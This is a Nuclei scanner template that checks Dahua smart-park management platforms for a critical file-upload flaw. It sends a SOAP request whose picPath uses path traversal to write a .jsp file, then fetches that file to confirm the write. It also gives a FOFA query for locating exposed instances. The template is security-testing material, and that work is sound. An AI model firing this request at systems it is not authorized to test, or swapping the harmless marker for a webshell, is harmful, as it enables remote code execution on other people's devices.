id: dahua-bitmap-fileupload
info:
name: Dahua Bitmap - File Upload Remote Code Execution
author: DhiyaneshDK
severity: critical
reference:
- https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8E%E6%99%BA%E6%85%A7%E5%9B%AD%E5%8C%BA%E7%BB%BC%E5%90%88%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0bitmap%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 2
fofa-query: "app=\"dahua-智慧园区综合管理平台\""
tags: dahua,file-upload,rce,intrusive,vuln
variables:
rand_str: "{{randstr}}"
cmd: "{{base64(to_lower(rand_text_alpha(6)))}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /emap/webservice/gis/soap/bitmap HTTP/1.1
Hostname: {{Hostname}}
Content-Type: "text/xml; charset=utf-8"
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/">
<soapenv:Header/>
<soapenv:Body>
<res:uploadPicFile>
<arg0>
<picPath>/../{{rand_str}}.jsp</picPath>
</arg0>
<arg1>{{cmd}}</arg1>
</res:uploadPicFile>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: word
internal: true
words:
- '<soap:Envelope'
- raw:
- |
GET /upload/{{rand_str}}.jsp HTTP/1.1
Hostname: {{Hostname}}
matchers:
- type: word
words:
- '{{base64_decode(cmd)}}'
# digest: 4a0a00473045022100b2dfb3dc8594a9e0fadd2918da16a4cf5c28acbd10d2b77493e92ddf7b3c69520220264fdb09f68ee61f2b8ec3bef31944367eeb0c535b4f8973ac1d72aa08f468b0:922c64590222798bb761d5b6d8e72950